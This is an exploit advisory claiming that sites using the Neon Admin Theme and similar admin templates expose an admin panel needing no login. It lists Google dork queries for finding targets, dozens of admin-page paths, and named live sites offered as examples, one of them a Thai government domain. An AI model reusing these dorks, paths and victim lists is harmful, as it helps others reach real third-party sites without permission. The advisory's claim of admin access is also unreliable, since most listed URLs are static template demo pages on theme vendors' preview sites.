#################################################################################################
# Exploit Title : WordPress © 2015 Neon Admin Theme by Laborator.co Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/11/2018
# Vendor Homepage : laborator.co
# Tested On : Windows and Linux
# Category : WebApps
# Software Download Link [ Similar ] : github.com/sbilly/joli-admin/tree/master/joli
# Google Dorks :
intext:''© 2015 Neon Admin Theme by Laborator''
intext:''© 2014 Xenon theme by Laborator''
intext:''Copyright © 2017 PixelAdmin LLC.''
intext:''© 2016 KAIJUTHEMES''
intext:''2014 © μAdmin - Responsive Multi-Style Admin Template''
intext:''© 2016 WebAdmin - All Rights Reserved.''
intext:''Open source community - Collect from AIOS''
intext:''2016 © Minton.''
intext:''© 2017 Your Company''
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-284 - [ Improper Access Control ] - CWE-285 - [ Improper Authorization ]
+ CWE-269 - [ Improper Privilege Management ]
#################################################################################################
# Admin Panel Login Path :
/eservice/
No Admin Username. No Admin Password.
Ok. Successful. Now, you are the Site Administrator.
The admin panel path differs for every target site.
For WordPress Panel Path :
/wp-login.php
# Exploits :
/eservice/dashboard-2.html
/eservice/dashboard-3.html
/eservice/mailbox.html
/eservice/extra-calendar.html
/eservice/skin-black.html
/eservice/skin-white.html
/eservice/skin-purple.html
/eservice/skin-cafe.html
/eservice/skin-red.html
/eservice/skin-green.html
/eservice/skin-yellow.html
/eservice/skin-blue.html
/eservice/skin-facebook.html
/eservice/highlights.html
/eservice/layout-api.html
/eservice/layout-api-right-sidebar.html
/eservice/layout-collapsed-sidebar.html
/eservice/layout-fixed-sidebar.html
/eservice/layout-chat-open.html
/eservice/layout-horizontal-menu-boxed.html
/eservice/layout-horizontal-menu-fluid.html
/eservice/layout-mixed-menus.html
/eservice/layout-right-sidebar.html
/eservice/layout-both-menus-right-sidebar.html
/eservice/layout-page-transition-fade.html
/eservice/layout-page-transition-left-in.html
/eservice/layout-page-transition-right-in.html
/eservice/layout-page-transition-fade-only.html
/eservice/layout-boxed.html
/eservice/ui-panels.html
/eservice/ui-tiles.html
/eservice/forms-buttons.html
/eservice/ui-typography.html
/eservice/ui-tabs-accordions.html
/eservice/ui-tooltips-popovers.html
/eservice/ui-navbars.html
/eservice/ui-breadcrumbs.html
/eservice/ui-badges-labels.html
/eservice/ui-progress-bars.html
/eservice/ui-modals.html
/eservice/ui-blockquotes.html
/eservice/ui-alerts.html
/eservice/ui-pagination.html
/eservice/mailbox.html
/eservice/mailbox-compose.html
/eservice/mailbox-message.html
/eservice/forms-main.html
/eservice/forms-advanced.html
/eservice/forms-wizard.html
/eservice/forms-validation.html
/eservice/forms-masks.html
/eservice/forms-sliders.html
/eservice/forms-file-upload.html
/eservice/forms-wysiwyg.html
/eservice/tables-main.html
/eservice/tables-datatable.html
/eservice/extra-icons.html
/eservice/extra-icons-entypo.html
/eservice/extra-icons-glyphicons.html
/eservice/extra-portlets.html
/eservice/extra-google-maps.html
/eservice/extra-vector-maps.html
/eservice/extra-chat-api.html
/eservice/extra-calendar.html
/eservice/extra-calendar-2.html
/eservice/extra-notes.html
/eservice/extra-lockscreen.html
/eservice/extra-register.html
/eservice/extra-invoice.html
/eservice/extra-gallery.html
/eservice/extra-gallery-single.html
/eservice/extra-members.html
/eservice/extra-profile.html
/eservice/extra-404.html
/eservice/extra-blank-page.html
/eservice/extra-timeline.html
/eservice/extra-comments.html
/eservice/extra-timeline-centered.html
/eservice/extra-tocify.html
/eservice/ui-notifications.html
/eservice/extra-new-post.html
/eservice/extra-settings.html
/eservice/extra-scrollbox.html
/eservice/extra-image-crop.html
/eservice/extra-search.html
/eservice/extra-language-selector.html
/eservice/extra-nestable.html
/eservice/extra-file-tree.html
/eservice/extra-load-progress.html
/eservice/charts.html
#################################################################################################
# Example Vulnerable Sites =>
amnat-ed.go.th/eservice/dashboard-3.html => [ Proof of Concept ] => archive.is/Uhwyr
# Example Admin Panel Login Path :
ict.amnat-ed.go.th/wp-login.php
spitalpharmazie-basel.ch/aml/extra-members.html
infinite-woodland-5276.herokuapp.com/ui-panels.html
foxythemes.net/preview/products/beagle/form-upload.html
idete.com.br/scripts/ui-panels.html
themeon.net/nifty/v2.9.1/ui-panels.html
colourcode.procoders.site/ui-panels.html
options-admin.themesease.com/ui-panels.html
jaybabani.com/ultra-admin-html/preview/ui-panels.html
uxpowered.com/products/pixeladmin/v232/html_demo/ui-panels.html
authenticgoods.co/wrapbootstrap/themes/spacelab_v1.4/ui-panels.html
portal.sitesonar.net/ui-panels.html
thinn.co.za/app/ui-panels.html
geekman.site/emphasize/ui/panels.html
swlabs.co/madmin_v1.1/code/style3/ui-panels.html
themesdesign.in/webadmin_1.1/layouts/red/ui-panels.html
dixminutes.wseils-dev.com/fileadmin/WB0048JF7/demo/ui-panels.html
tcode.me/uploads/demo/demo104/MAdmin/ui-panels.html
ui-worx.com.preview.services/Roxino/ui-panels.html
4afterworkdev.com/ui-panels.html
theme.zy62.com/ui-panels.html
geedmo.com/themes/naut/v1.4/html5jquery/dist/ui.panels.html
tumblr.teamon.eu/minton/Admin/blue_hori/ui-panels.html
ui92.com/demo/html/430/ui-panels.html
swlabs.co/madmin_v1.1/code/style3/ui-panels.html
coderthemes.com/zircos/default-boxed/ui-panels.html
demo8.chrisansgroup.com/fanatig/dashboard_customer/1/dashboard/big-bang-studio.com/cosmos/ui-panels.html
mglcloud.cn/ui-panels.html
fxbitlab.com/template/template10/ui-panels.html
themifycloud.com/demos/templates/joli/ui-panels.html
demo.thedevelovers.com/dashboard/klorofilpro-v1.6/html/ui-panels.html
ressources.kilkoa.com/PixelAdmin-1.3.0/html/ui-panels.html
aqvatarius.com/themes/atlant/html/ui-panels.html
shop.moonflyer.net/ui-panels.html
kuitao8.com/demo/20170225/20170225100041255/ui-panels.html
themeon.net/nifty/v2.8/ui-panels.html
hmelius.com/ad_outline/ui-panels.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################